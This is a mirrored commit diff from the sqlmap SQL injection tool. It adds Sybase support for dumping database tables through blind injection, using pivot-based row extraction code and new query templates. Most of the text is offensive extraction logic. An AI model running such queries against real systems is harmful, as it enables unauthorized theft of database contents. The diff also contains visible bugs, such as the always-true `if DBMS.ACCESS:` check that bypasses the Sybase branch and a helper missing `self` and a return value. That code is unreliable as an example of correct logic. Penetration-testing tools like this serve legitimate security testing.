mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 03:23:48 +03:00
update regarding Sybase dumping
This commit is contained in:
parent
df58bcaf95
commit
5f4ffc9287
|
@ -1039,7 +1039,7 @@ class Enumeration:
|
|||
elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
|
||||
query = rootQuery.blind.count % conf.tbl.upper()
|
||||
query += condQuery
|
||||
elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.tbl)
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
|
||||
|
@ -1075,7 +1075,7 @@ class Enumeration:
|
|||
query = rootQuery.blind.query % (conf.tbl.upper())
|
||||
query += condQuery
|
||||
field = None
|
||||
elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
query = rootQuery.blind.query % (conf.db, conf.db,
|
||||
conf.db, conf.db,
|
||||
conf.db, conf.db,
|
||||
|
@ -1123,6 +1123,86 @@ class Enumeration:
|
|||
|
||||
return kb.data.cachedColumns
|
||||
|
||||
def __pivotDumpTable(dumpNode, table, colList, indexRange, blind=True):
|
||||
lengths = {}
|
||||
entries = {}
|
||||
|
||||
validColumnList = False
|
||||
validPivotValue = False
|
||||
|
||||
count = len(indexRange)
|
||||
|
||||
for column in colList:
|
||||
infoMsg = "fetching number of distinct "
|
||||
infoMsg += "values for column '%s'" % column
|
||||
logger.info(infoMsg)
|
||||
|
||||
query = dumpNode.count2 % (column, table)
|
||||
if blind:
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
else:
|
||||
value = inject.getValue(query, blind=False)
|
||||
|
||||
if isNumPosStrValue(value):
|
||||
validColumnList = True
|
||||
if value == count:
|
||||
infoMsg = "using column '%s' as a pivot " % column
|
||||
infoMsg += "for retrieving row data"
|
||||
logger.info(infoMsg)
|
||||
|
||||
validPivotValue = True
|
||||
|
||||
colList.remove(column)
|
||||
colList.insert(0, column)
|
||||
break
|
||||
|
||||
if not validColumnList:
|
||||
errMsg = "all column name(s) provided are non-existent"
|
||||
raise sqlmapNoneDataException, errMsg
|
||||
|
||||
if not validPivotValue:
|
||||
warnMsg = "no proper pivot column provided (with unique values)."
|
||||
warnMsg += " all rows can't be retrieved."
|
||||
logger.warn(warnMsg)
|
||||
|
||||
pivotValue = " "
|
||||
breakRetrieval = False
|
||||
|
||||
for index in indexRange:
|
||||
if breakRetrieval:
|
||||
break
|
||||
|
||||
for column in colList:
|
||||
if column not in lengths:
|
||||
lengths[column] = 0
|
||||
|
||||
if column not in entries:
|
||||
entries[column] = []
|
||||
|
||||
if column == colList[0]:
|
||||
# Correction for pivotValues with unrecognized chars
|
||||
if pivotValue and '?' in pivotValue and pivotValue[0]!='?':
|
||||
pivotValue = pivotValue.split('?')[0]
|
||||
pivotValue = pivotValue[:-1] + chr(ord(pivotValue[-1]) + 1)
|
||||
query = dumpNode.query % (column, table, column, pivotValue)
|
||||
else:
|
||||
query = dumpNode.query2 % (column, table, colList[0], pivotValue)
|
||||
|
||||
if blind:
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
else:
|
||||
value = inject.getValue(query, blind=False)
|
||||
|
||||
if column == colList[0]:
|
||||
if not value:
|
||||
breakRetrieval = True
|
||||
break
|
||||
else:
|
||||
pivotValue = value
|
||||
|
||||
lengths[column] = max(lengths[column], len(value) if value else 0)
|
||||
entries[column].append(value)
|
||||
|
||||
def dumpTable(self):
|
||||
if not conf.tbl and not conf.col:
|
||||
errMsg = "missing table parameter"
|
||||
|
@ -1265,6 +1345,8 @@ class Enumeration:
|
|||
query = rootQuery.blind.count % (conf.tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), conf.tbl.upper())))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.count % conf.tbl
|
||||
elif Backend.getIdentifiedDbms() == DBMS.SYBASE:
|
||||
query = rootQuery.blind.count % ("%s..%s" % (conf.db, conf.tbl))
|
||||
else:
|
||||
query = rootQuery.blind.count % (conf.db, conf.tbl)
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
||||
|
@ -1290,16 +1372,21 @@ class Enumeration:
|
|||
indexRange = getRange(count, dump=True, plusOne=plusOne)
|
||||
|
||||
try:
|
||||
if Backend.getIdentifiedDbms() == DBMS.ACCESS:
|
||||
if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE):
|
||||
validColumnList = False
|
||||
validPivotValue = False
|
||||
|
||||
if DBMS.ACCESS:
|
||||
table = conf.tbl
|
||||
elif DBMS.SYBASE:
|
||||
table = "%s..%s" % (conf.db, conf.tbl)
|
||||
|
||||
for column in colList:
|
||||
infoMsg = "fetching number of distinct "
|
||||
infoMsg += "values for column '%s'" % column
|
||||
logger.info(infoMsg)
|
||||
|
||||
query = rootQuery.blind.count2 % (column, conf.tbl)
|
||||
query = rootQuery.blind.count2 % (column, table)
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
|
||||
if isNumPosStrValue(value):
|
||||
|
@ -1343,9 +1430,9 @@ class Enumeration:
|
|||
if pivotValue and '?' in pivotValue and pivotValue[0]!='?':
|
||||
pivotValue = pivotValue.split('?')[0]
|
||||
pivotValue = pivotValue[:-1] + chr(ord(pivotValue[-1]) + 1)
|
||||
query = rootQuery.blind.query % (column, conf.tbl, column, pivotValue)
|
||||
query = rootQuery.blind.query % (column, table, column, pivotValue)
|
||||
else:
|
||||
query = rootQuery.blind.query2 % (column, conf.tbl, colList[0], pivotValue)
|
||||
query = rootQuery.blind.query2 % (column, table, colList[0], pivotValue)
|
||||
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
|
||||
|
|
|
@ -468,7 +468,7 @@
|
|||
|
||||
<!-- Sybase -->
|
||||
<dbms value="Sybase">
|
||||
<cast query="CAST(%s AS VARCHAR(8000))"/>
|
||||
<cast query="CONVERT(NVARCHAR(4000),%s)"/>
|
||||
<length query="LTRIM(STR(LEN(%s)))"/>
|
||||
<isnull query="ISNULL(%s, ' ')"/>
|
||||
<delimiter query="+"/>
|
||||
|
@ -512,7 +512,7 @@
|
|||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s..%s"/>
|
||||
<blind query="SELECT TOP 1 %s FROM (SELECT TOP 1 * FROM ( SELECT TOP %d * FROM %s..%s ORDER BY %s ASC ) AS t1 ORDER BY %s DESC) AS t2 ORDER BY %s ASC" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE " condition="name"/>
|
||||
|
|
Loading…
Reference in New Issue
Block a user